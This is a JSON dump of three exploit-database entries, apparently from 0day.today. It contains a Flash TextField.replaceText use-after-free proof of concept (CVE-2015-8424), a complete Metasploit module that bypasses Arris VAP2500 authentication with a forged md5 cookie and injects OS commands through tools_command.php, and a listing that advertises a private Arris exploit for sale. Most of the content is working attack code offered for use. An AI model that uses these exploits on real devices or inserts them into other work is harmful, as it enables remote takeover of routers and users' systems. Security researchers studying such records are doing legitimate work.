{"result": {"zdt": [{"lastseen": "2018-04-13T07:51:36", "references": [], "description": "Exploit for windows platform in category dos / poc", "edition": 2, "reporter": "Google Security Research", "published": "2015-12-18T00:00:00", "title": "Adobe Flash TextField.replaceText - Use-After-Free", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-13T07:51:36", "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:N/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-8424"], "modified": "2015-12-18T00:00:00", "id": "1337DAY-ID-25734", "href": "https://0day.today/exploit/description/25734", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=584\r\n \r\nThere is a use-after-free in the TextField.replaceText function. If the function is called with a string parameter with toString defined, or an integer parameter with valueOf defined, the parent object of the TextField can be used after it is freed. Please note that all three parameters of this function are susceptible to this issue.\r\n \r\nA minimal PoC is as follows:\r\n \r\nvar times = 0;\r\nvar mc = this.createEmptyMovieClip(\"mc\", 101);\r\nvar tf = mc.createTextField(\"tf\", 102, 1, 1, 100, 100);\r\ntf.replaceText( 1, 2, {valueOf : func});\r\n \r\nfunction func(){\r\n \r\n mc.removeMovieClip();\r\n \r\n // Fix heap here\r\n \r\n return \"text\";\r\n \r\n }\r\n \r\nA sample swf and fla are attached.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39048.zip\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25734"}, {"lastseen": "2018-04-02T03:25:18", "references": [], "description": "Arris VAP2500 access points are vulnerable to OS command injection in the web management portal via the tools_command.php page. Though authentication is required to access this page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid username.", "edition": 2, "reporter": "metasploit", "published": "2015-01-22T00:00:00", "title": "Arris VAP2500 Command Execution Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-02T03:25:18", "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C/", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8424", "CVE-2014-8423"], "modified": "2015-01-22T00:00:00", "id": "1337DAY-ID-23173", "href": "https://0day.today/exploit/description/23173", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Arris VAP2500 tools_command.php Command Execution',\r\n 'Description' => %q{\r\n Arris VAP2500 access points are vulnerable to OS command injection in the web management\r\n portal via the tools_command.php page. Though authentication is required to access this\r\n page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid\r\n username.\r\n },\r\n 'Author' =>\r\n [\r\n 'HeadlessZeke' # Vulnerability discovery and Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2014-8423'],\r\n ['CVE', '2014-8424'],\r\n ['OSVDB', '115045'],\r\n ['OSVDB', '115046'],\r\n ['BID', '71297'],\r\n ['BID', '71299'],\r\n ['URL', 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/']\r\n ],\r\n 'DisclosureDate' => 'Nov 25 2014',\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'Space' => 1024,\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic telnet'\r\n }\r\n },\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [[ 'Automatic', { }]],\r\n 'DefaultTarget' => 0\r\n ))\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_raw({\r\n 'method' => 'GET',\r\n 'uri' => '/tools_command.php',\r\n 'cookie' => \"p=#{Rex::Text.md5('super')}\"\r\n })\r\n if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Trying to access the device ...\")\r\n\r\n unless check == Exploit::CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Failed to access the vulnerable device\")\r\n end\r\n\r\n print_status(\"#{peer} - Exploiting...\")\r\n\r\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\r\n exploit_cmd\r\n else\r\n exploit_session\r\n end\r\n end\r\n\r\n def exploit_cmd\r\n beg_boundary = rand_text_alpha(8)\r\n end_boundary = rand_text_alpha(8)\r\n\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri('/', 'tools_command.php'),\r\n 'vars_post' => {\r\n 'cmb_header' => '',\r\n 'txt_command' => \"echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}\"\r\n },\r\n 'method' => 'POST',\r\n 'cookie' => \"p=#{Rex::Text.md5('super')}\"\r\n })\r\n\r\n if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/\r\n print_good(\"#{peer} - Command sent successfully\")\r\n if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m\r\n print_status(\"#{peer} - Command output: #{$1}\")\r\n end\r\n else\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Command execution failed\")\r\n end\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\r\n end\r\n end\r\n\r\n def exploit_session\r\n begin\r\n send_request_cgi({\r\n 'uri' => normalize_uri('/', 'tools_command.php'),\r\n 'vars_post' => {\r\n 'cmb_header' => '',\r\n 'txt_command' => \"#{payload.encoded}\"\r\n },\r\n 'method' => 'POST',\r\n 'cookie' => \"p=#{Rex::Text.md5('super')}\"\r\n }, 3)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\r\n end\r\n end\r\nend\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23173"}, {"lastseen": "2018-01-03T19:14:43", "references": [], "description": "ARRIS VAP2500 - WIRELESS VIDEO ACCESS POINT \r This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ARRIS VAP2500. Authentication is not required to exploit this vulnerability.\r The specific flaw exists within the handling of user authentication. The issue lies in the failure to compare the password when authenticating. An attacker can leverage this vulnerability to bypass authentication checks which can then be chained to execute code with root privileges.\n\nThis is private exploit. You can buy it at https://0day.today", "edition": 2, "reporter": "rrdw", "published": "2014-11-30T00:00:00", "title": "ARRIS VAP2500 Management Portal Authentication Bypass Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-03T19:14:43", "vector": "AV:N/AC:L/Au:M/C:C/I:C/A:C/", "value": 8.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8424"], "modified": "2014-11-30T00:00:00", "id": "1337DAY-ID-22946", "href": "https://0day.today/exploit/description/22946", "sourceData": "", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": ""}]}}